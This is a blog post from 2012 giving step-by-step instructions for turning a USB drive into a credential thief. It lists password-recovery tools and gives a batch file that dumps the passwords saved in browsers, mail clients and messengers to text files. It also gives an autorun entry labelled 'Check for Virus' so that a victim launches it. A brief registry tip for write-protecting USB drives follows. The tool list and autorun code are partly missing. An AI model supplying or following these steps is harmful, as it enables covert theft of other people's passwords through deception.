Related Posts Plugin for WordPress, Blogger...

Friday, 26 October 2012

Make your USB a password stealer

Hello friends,
Nowadays USB is a common device used to transfer data from a computer to another....Collages,Schools,Offices...etc

You will be shocked to know that a USB can also snatch passwords from your computer.
In this post i will show you how to do that.

How to turn your USB into a password thief?

Few tools you need to download for sniffing passwords:

1. IE PassView
- Reveals passwords stored by Internet Explorer

2.Mail PassView
- Reveals passwords stored by any desktop email clients like Mozilla Thunderbird, Microsoft Outlook, Eudora, Netscape, Windows Live Mail etc.

- Reveals passwords stored by the Mozilla Firefox browser.

-Reveals passwords stored by Google Chrome Web-browser.

5.Opera PassView
-Reveals passwords stored by Opera Web-browser.

-Reveals passwords stored by the following instant messenger applications:
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

1. First of all you need to download all the above mentioned six applications. Next, as all of them are zipped, you have to unzip(extract) them all and put(only) the .exe files in the root directory of the USB.Next, open Notepad and paste the following code in it and save it in the USB as autorun.inf

ACTION= Check for Virus

2. Now open Notepad again and type the code below and save it as explode.bat

start iepv.exe /stext iepv.txt
start passwordfox.exe /stext passwordfox.txt
start chromepass.exe /stext chromepass.txt
start mailpv.exe /stext mailpv.txt
start operapassview.exe /stext operapassview.txt
start mspass.exe /stext mspass.txt

3. Bingo, your password stealer USB is finally ready for action.

How to Use it:

When you insert the USB drive into a computer, an autorun screen will appear with the option Check for Virus. Click on it and automatically all the passwords will be saved to your USB in .txt files.

How to Protect your PC from this kind of threat:

It is advisable to disable the USB ports of your computer when it is exposed to other users by going to the BIOS setup but this also has its own set of limitations as disabling the USB ports would also disable USB keyboards, USB printers etc.

Hence I've come up with a registry hack which doesn't disable your USB ports but instead disables write access to USB ports so that data cannot be written into pendrives.

Step 1:

Open the Windows Registry by going to 'run' and typing "regedit.exe" and then follow the following path:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Control\StorageDevicePolicies

Now on the right hand panel, right click and add a DWORD Value called WriteProtect and assign its value to 1(assign the value to 0 again to disable write protection on your drives) and you successfully protected your PC from this hack. :)

Please spend some time to share this article with your friends and don't hesitate to leave comments on this post..!!!!


Post a Comment